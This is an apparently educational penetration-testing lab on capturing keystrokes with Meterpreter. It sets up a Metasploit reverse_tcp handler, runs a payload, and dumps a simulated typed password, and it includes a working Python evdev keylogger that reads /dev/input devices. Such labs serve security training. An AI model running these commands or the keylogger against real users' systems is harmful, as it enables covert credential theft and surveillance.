Log Keystrokes on a Target using Meterpreter


Introduction

In this lab, you will explore a common post-exploitation technique: keystroke logging. Keystroke logging, or "keylogging," is the process of recording the keys struck on a keyboard, typically covertly, so that the person using the keyboard is unaware that their actions are being monitored. In penetration testing, this technique is invaluable for gathering sensitive information such as usernames, passwords, and other confidential data.

We will use Meterpreter, the Metasploit Framework's most capable payload, to accomplish this. Meterpreter ships a set of built-in keystroke-sniffing commands (keyscan_start, keyscan_dump and keyscan_stop) that let an operator start a keylogger on a compromised system, retrieve what it captured, and stop it again. Throughout this lab, you will learn how to gain a Meterpreter session, deploy the keylogger, capture keystrokes, and then clean up your tracks.

Gain a Meterpreter session on a target

In this step, we will set up a listener in Metasploit and execute a payload to gain a Meterpreter session. For the purpose of this lab, we will act as both the attacker and the target on the same machine. A payload file named payload.elf has already been created for you in the ~/project directory.

First, let's start the Metasploit Framework console.

msfconsole -q

Once msfconsole is loaded, we need to set up a handler to listen for the incoming connection from our payload.

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444

Now, run the listener as a background job using the -j flag.

exploit -j

You should see that the handler has started.

[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 127.0.0.1:4444

Now, open a new terminal tab by clicking the + icon in the terminal panel. In this new tab, execute the payload.

./payload.elf

Switch back to your first terminal tab with msfconsole. You should see a message indicating that a Meterpreter session has been opened.

[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:38908) at 2023-10-27 10:30:00 -0400

To interact with this new session, use the sessions command.

sessions -i 1

Your prompt should change to meterpreter >, indicating you are now in control of the target session.

[*] Starting interaction with 1...

meterpreter >

Start the keystroke logger with the keyscan_start command

In this step, with an active Meterpreter session, we will start the keystroke logger on the target machine. The command for this is keyscan_start. It starts a keystroke sniffer inside the process that hosts Meterpreter (no separate binary is written to disk) and begins recording the keyboard input delivered to that process's interactive session. The sniffer captures keyboard events, not shell history: on Windows it sees the desktop of the session the Meterpreter process lives in, which is why operators commonly migrate into a process owned by the logged-on user (such as explorer.exe) before starting it.

Ensure you are at the meterpreter > prompt. Type the following command and press Enter:

keyscan_start

The system will confirm that the keylogger has been initiated.

Starting the keystroke sniffer...

The logger is now running silently in the background on the target system, recording every key that is pressed.
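To make concrete what a keystroke sniffer on a Linux host actually consumes, here is an added example; it is not part of the lab and not Meterpreter's own implementation. It decodes raw evdev struct input_event records, the kind a userland keylogger reads from /dev/input/eventN (which requires root or membership in the input group), into the text that was typed, tracking Shift and ignoring key releases and non-key events. The event stream it runs on is constructed inside the code, and the device path used by sniff() is an assumption.

```python
"""Added example (not part of the lab, not Meterpreter's code): decode Linux
evdev keyboard events, the raw material a userland keylogger on a Linux host
reads from /dev/input/eventN, into the text that was typed."""
import struct

# struct input_event on 64-bit Linux: struct timeval {long tv_sec; long tv_usec;},
# __u16 type, __u16 code, __s32 value -> 24 bytes with native alignment.
INPUT_EVENT = struct.Struct("llHHi")
EV_KEY = 1                       # key/button state change (EV_SYN=0, EV_MSC=4 are skipped)
KEY_UP, KEY_DOWN, KEY_REPEAT = 0, 1, 2
LEFTSHIFT, RIGHTSHIFT = 42, 54   # KEY_LEFTSHIFT / KEY_RIGHTSHIFT from input-event-codes.h

# Keycode -> (unshifted, shifted) for a US layout, built from the four contiguous
# QWERTY rows of linux/input-event-codes.h (KEY_1=2, KEY_Q=16, KEY_A=30, KEY_Z=44).
KEYMAP = {}
for base, plain, shifted in (
    (2, "1234567890-=", "!@#$%^&*()_+"),
    (16, "qwertyuiop[]", "QWERTYUIOP{}"),
    (30, "asdfghjkl;'", 'ASDFGHJKL:"'),
    (44, "zxcvbnm,./", "ZXCVBNM<>?"),
):
    for i, pair in enumerate(zip(plain, shifted)):
        KEYMAP[base + i] = pair
KEYMAP[57] = (" ", " ")     # KEY_SPACE
KEYMAP[28] = ("\n", "\n")   # KEY_ENTER


def decode_events(raw: bytes) -> str:
    """Replay a byte stream of input_event records and return the characters typed."""
    shift = False
    typed = []
    usable = len(raw) - len(raw) % INPUT_EVENT.size   # drop a partial trailing record
    for off in range(0, usable, INPUT_EVENT.size):
        _sec, _usec, etype, code, value = INPUT_EVENT.unpack_from(raw, off)
        if etype != EV_KEY:
            continue                       # EV_SYN frame markers, EV_MSC scancodes, LEDs
        if code in (LEFTSHIFT, RIGHTSHIFT):
            shift = value != KEY_UP        # track modifier state across events
            continue
        if value == KEY_UP:
            continue                       # only presses (and autorepeats) produce text
        plain, shifted = KEYMAP.get(code, ("", ""))   # unmapped keys (F-keys, arrows) are dropped
        typed.append(shifted if shift else plain)
    return "".join(typed)


def sniff(device: str = "/dev/input/event0", n_events: int = 256) -> str:
    """Read n_events raw records from an evdev node (assumed path; needs root or the
    input group) and decode them. Blocks until that many events have arrived."""
    with open(device, "rb", buffering=0) as dev:
        raw = dev.read(INPUT_EVENT.size * n_events)
    return decode_events(raw)


def constructed_keystrokes(text: str) -> bytes:
    """Build a constructed event stream for `text` (press, EV_SYN, release per key,
    with Shift held around shifted characters). Sample input, not a real capture."""
    reverse = {}
    for code, (plain, shifted) in KEYMAP.items():
        reverse.setdefault(plain, (code, False))
        reverse.setdefault(shifted, (code, True))
    ts = 1700000000
    events = []
    for ch in text:
        code, needs_shift = reverse[ch]
        if needs_shift:
            events.append(INPUT_EVENT.pack(ts, 0, EV_KEY, LEFTSHIFT, KEY_DOWN))
        events.append(INPUT_EVENT.pack(ts, 0, EV_KEY, code, KEY_DOWN))
        events.append(INPUT_EVENT.pack(ts, 0, 0, 0, 0))          # EV_SYN / SYN_REPORT
        events.append(INPUT_EVENT.pack(ts, 0, EV_KEY, code, KEY_UP))
        if needs_shift:
            events.append(INPUT_EVENT.pack(ts, 0, EV_KEY, LEFTSHIFT, KEY_UP))
    return b"".join(events)


if __name__ == "__main__":
    sample = constructed_keystrokes('echo "MySuperSecretPassword123"\n')
    print(decode_events(sample), end="")
```

The point of the decoder is the part a sniffer cannot skip: it must keep modifier state across events and separate presses from releases, otherwise a captured password loses its capitalisation and punctuation. The same need to sit on the interactive input path is why keyscan only sees what the target's keyboard delivers to the session it runs in, and why reading an evdev node needs root or the input group.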

Wait for the user to type information

In this step, we will simulate a user typing sensitive information on the target machine. Since our keylogger is active, it will capture this activity.

Open a new terminal tab again by clicking the + icon. In this new terminal, we will simulate a user typing a password. You can type any command, but for this example, we'll use echo to simulate typing a secret password.

echo "MySuperSecretPassword123"

After running the command, you can close this new terminal tab. The keystrokes for echo "MySuperSecretPassword123" have now been captured by our running keylogger. Return to the terminal tab where your Meterpreter session is active.

Dump the captured keystrokes with the keyscan_dump command

In this step, we will retrieve the keystrokes that have been captured by the logger. The keyscan_dump command fetches all the recorded keystrokes from the target machine and displays them in your Meterpreter console.

At the meterpreter > prompt, execute the following command:

keyscan_dump

You will see the output of all the keystrokes captured since the logger was started. This will include the command you typed in the previous step.

Dumping captured keystrokes...

echo "MySuperSecretPassword123"

As you can see, the command we typed in the other terminal has been successfully captured. This demonstrates how an attacker can steal credentials, commands, and other sensitive text typed by a user.

Stop the keystroke logger with keyscan_stop

In this step, we will stop the keylogger. keyscan_stop ends the sniffer and discards its capture buffer on the target. It is crucial for a penetration tester to clean up after an engagement: stop any running tools, remove dropped artifacts (in a real engagement that would include the payload.elf you executed), and leave the target system as it was found.

To stop the keylogger, use the keyscan_stop command in your Meterpreter session.

keyscan_stop

The system will confirm that the keylogger has been stopped.

Stopping the keystroke sniffer...

The keylogger is no longer active on the target machine. You can now exit the Meterpreter session and msfconsole by typing exit twice: the first exit terminates session 1, and the second exits msfconsole, which also stops the background handler job.

Summary

In this lab, you have successfully learned how to perform keystroke logging on a target system using Meterpreter. You practiced the entire lifecycle of this post-exploitation technique, from gaining a session to cleaning up your tools.

You learned how to:

  • Establish a Meterpreter session using a handler and a payload.
  • Start the keylogger on a target using the keyscan_start command.
  • Dump the captured keystrokes to view sensitive information with keyscan_dump.
  • Stop the keylogger and clean up the session using keyscan_stop.

This is a powerful technique that highlights the importance of system security and monitoring. Remember to use these skills responsibly and ethically. Congratulations on completing the lab!